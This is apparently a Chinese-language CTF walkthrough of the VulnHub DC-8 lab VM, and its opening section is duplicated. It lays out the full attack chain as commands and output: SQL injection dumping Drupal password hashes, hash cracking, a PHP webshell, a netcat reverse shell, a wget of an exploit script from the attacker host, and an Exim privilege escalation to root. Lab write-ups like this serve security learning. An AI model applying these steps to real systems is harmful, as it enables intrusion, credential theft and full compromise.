vulnhub: DC 8
信息收集
开放22、80端口,80端口使用drupal 7搭建。
root@kali:/opt/test# nmap -Av 192.168.76.136 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 22:29 CST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating ARP Ping Scan at 22:29 Scanning 192.168.76.136 [1 port] Completed ARP Ping Scan at 22:29, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:29 Completed Parallel DNS resolution of 1 host. at 22:29, 13.00s elapsed Initiating SYN Stealth Scan at 22:29 Scanning 192.168.76.136 [1000 ports] Discovered open port 80/tcp on 192.168.76.136 Discovered open port 22/tcp on 192.168.76.136 Completed SYN Stealth Scan at 22:29, 0.10s elapsed (1000 total ports) Initiating Service scan at 22:29 Scanning 2 services on 192.168.76.136 Completed Service scan at 22:29, 6.74s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.76.136 NSE: Script scanning 192.168.76.136. Initiating NSE at 22:29 Completed NSE at 22:29, 0.74s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.05s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Nmap scan report for 192.168.76.136 Host is up (0.0014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA) | 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA) |_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519) 80/tcp open http Apache httpd |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache |_http-title: Welcome to DC-8 | DC-8
在 CHANGELOG.txt中看到版本已经到7.67,在exploitdb中没有找到相关利用脚本。尝试在Web上找利用点。
点击detail下面的3个链接,其对应的url链接和页面目录对应的链接不一样,Who We Are 分别对应:http://192.168.76.136/?nid=2和http://192.168.76.136/node/2,在nid=2处存在
------------恢复内容开始------------
信息收集
开放22、80端口,80端口使用drupal 7搭建。
root@kali:/opt/test# nmap -Av 192.168.76.136 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 22:29 CST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Initiating ARP Ping Scan at 22:29 Scanning 192.168.76.136 [1 port] Completed ARP Ping Scan at 22:29, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:29 Completed Parallel DNS resolution of 1 host. at 22:29, 13.00s elapsed Initiating SYN Stealth Scan at 22:29 Scanning 192.168.76.136 [1000 ports] Discovered open port 80/tcp on 192.168.76.136 Discovered open port 22/tcp on 192.168.76.136 Completed SYN Stealth Scan at 22:29, 0.10s elapsed (1000 total ports) Initiating Service scan at 22:29 Scanning 2 services on 192.168.76.136 Completed Service scan at 22:29, 6.74s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.76.136 NSE: Script scanning 192.168.76.136. Initiating NSE at 22:29 Completed NSE at 22:29, 0.74s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.05s elapsed Initiating NSE at 22:29 Completed NSE at 22:29, 0.00s elapsed Nmap scan report for 192.168.76.136 Host is up (0.0014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA) | 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA) |_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519) 80/tcp open http Apache httpd |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache |_http-title: Welcome to DC-8 | DC-8
在 CHANGELOG.txt中看到版本已经到7.67,在exploitdb中没有找到相关利用脚本。尝试在Web上找利用点。
点击detail下面的3个链接,其对应的url链接和页面目录对应的链接不一样,Who We Are 分别对应:http://192.168.76.136/?nid=2和http://192.168.76.136/node/2,在nid=2处存在注入:
使用sqlmap得到用户名和密码:
[22:45:48] [INFO] retrieved: '1567498512','a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";}','','john','1567489250'... Database: d7db Table: users [3 entries] +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+--------+------------+---------+------------+--------------------+-----------+------------+------------------+ | uid | init | mail | pass | login | theme | data | name | status | created | picture | access | timezone | signature | language | signature_format | +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+--------+------------+---------+------------+--------------------+-----------+------------+------------------+ | 0 | <blank> | <blank> | <blank> | 0 | <blank> | NULL | <blank> | 0 | 0 | 0 | 0 | NULL | <blank> | <blank> | NULL | | 1 | dc8blah@dc8blah.org | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | <blank> | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | admin | 1 | 1567489015 | 0 | 1567766818 | Australia/Brisbane | <blank> | <blank> | filtered_html | | 2 | john@blahsdfsfd.org | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | <blank> | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john | 1 | 1567489250 | 0 | 1567498512 | Australia/Brisbane | <blank> | <blank> | filtered_html | +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+--------+------------+---------+------------+--------------------+-----------+------------+------------------+
使用john的缺省字典得到用户john的密码:
root@kali:/opt/test# john test Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist turtle (?) 1g 0:00:00:04 DONE 2/3 (2020-09-15 23:00) 0.2364g/s 262.8p/s 262.8c/s 262.8C/s trident..utopia Use the "--show" option to display all of the cracked passwords reliably Session completed
用该用户登录Web,在webform的form setting中可以插入php代码,上传一句话:
在前台页面contact us中填写信息,页面会跳转:
补充参数:
反弹shell回连kali:
root@kali:/opt/test# nc -nlvp 6666 listening on [any] 6666 ... connect to [192.168.76.129] from (UNKNOWN) [192.168.76.136] 55538 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c 'import pty;pty.spawn("/bin/bash")' www-data@dc-8:/var/www/html$ whoami whoami www-data www-data@dc-8:/var/www/html$
查找具有SUID权限的服务:
www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/bin/chfn /usr/bin/gpasswd /usr/bin/chsh /usr/bin/passwd /usr/bin/sudo /usr/bin/newgrp /usr/sbin/exim4 /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /bin/ping /bin/su /bin/umount /bin/mount www-data@dc-8:/var/www/html$
查看服务版本:
www-data@dc-8:/var/www/html$ exim4 --version exim4 --version Exim version 4.89 #2 built 14-Jun-2017 05:03:07 Copyright (c) University of Cambridge, 1995 - 2017 (c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017 Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013) Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd Authenticators: cram_md5 plaintext Routers: accept dnslookup ipliteral manualroute queryprogram redirect Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp Fixed never_users: 0 Configure owner: 0:0 Size of off_t: 8
查找利用脚本:
root@kali:/opt/test# searchsploit exim --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Dovecot with Exim - 'sender_address' Remote Command Execution | linux/remote/25297.txt Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | linux/remote/36421.rb Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | linux/local/39702.rb Exim - 'sender_address' Remote Code Execution | linux/remote/25970.py Exim 3.x - Format String | linux/local/20900.txt Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | linux/local/756.c Exim 4.41 - 'dns_build_reverse' Local Read Emails | linux/local/1009.c Exim 4.42 - Local Privilege Escalation | linux/local/796.sh Exim 4.43 - 'auth_spa_server()' Remote | linux/remote/812.c Exim 4.63 - Remote Command Execution | linux/remote/15725.pl Exim 4.84-3 - Local Privilege Escalation | linux/local/39535.sh Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb Exim 4.87 < 4.91 - (Local / Remote) Command Execution | linux/remote/46974.txt Exim 4.89 - 'BDAT' Denial of Service | multiple/dos/43184.txt exim 4.90 - Remote Code Execution | linux/remote/45671.py Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py Exim Buffer 1.6.2/1.6.51 - Local Overflow | unix/local/20333.c Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | linux/dos/35951.py Exim Internet Mailer 3.35/3.36/4.10 - Format String | linux/local/22066.c Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | linux/remote/24093.c Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | linux/remote/16925.rb PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
选择linux/local/46996.sh 尝试提权。将提权脚本复制到www目录下:
root@kali:/opt/test# cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/ root@kali:/opt/test# service apache2 start
在靶机上wget脚本到/tmp目录下:
www-data@dc-8:/tmp$ wget http://192.168.76.129/46996.sh wget http://192.168.76.129/46996.sh --2020-09-16 11:57:54-- http://192.168.76.129/46996.sh Connecting to 192.168.76.129:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3706 (3.6K) [text/x-sh] Saving to: '46996.sh' 46996.sh 100%[===================>] 3.62K --.-KB/s in 0s 2020-09-16 11:57:54 (198 MB/s) - '46996.sh' saved [3706/3706]
直接执行报错:
www-data@dc-8:/tmp$ chmod 777 46996.sh chmod 777 46996.sh www-data@dc-8:/tmp$ ./46996.sh ./46996.sh bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory
原因是文件用dos编辑,结尾为\r\n需要修改为\n在kali上编辑文件输入:set ff=unix,保存退出即可,重新下载文件赋予执行权限。
该脚本有两种利用方式
缺省执行:./46996.sh不成功:
www-data@dc-8:/tmp$ ./46996.sh ./46996.sh raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> Preparing setuid shell helper... Problems compiling setuid shell helper, check your gcc. Falling back to the /bin/sh method.
使用./46996.sh -m netcat可以成功得到root权限:
./46996.sh -m netcat raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> Delivering netcat payload... 220 dc-8 ESMTP Exim 4.89 Fri, 18 Sep 2020 10:20:56 +1000 250 dc-8 Hello localhost [::1] 250 OK 250 Accepted 354 Enter message, ending with "." on a line by itself 250 OK id=1kJ492-0000Ec-H9 221 dc-8 closing connection Waiting 5 seconds... localhost [127.0.0.1] 31337 (?) open id id uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim) pwd pwd /var/spool/exim4 cd /root cd /root ls ls flag.txt cat flag.txt cat flag.txt Brilliant - you have succeeded!!! 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm also sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 This challenge was largely based on two things: 1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile. 2. A suggestion from @theart42 The answer to that question is... If you enjoyed this CTF, send me a tweet via @DCAU7.
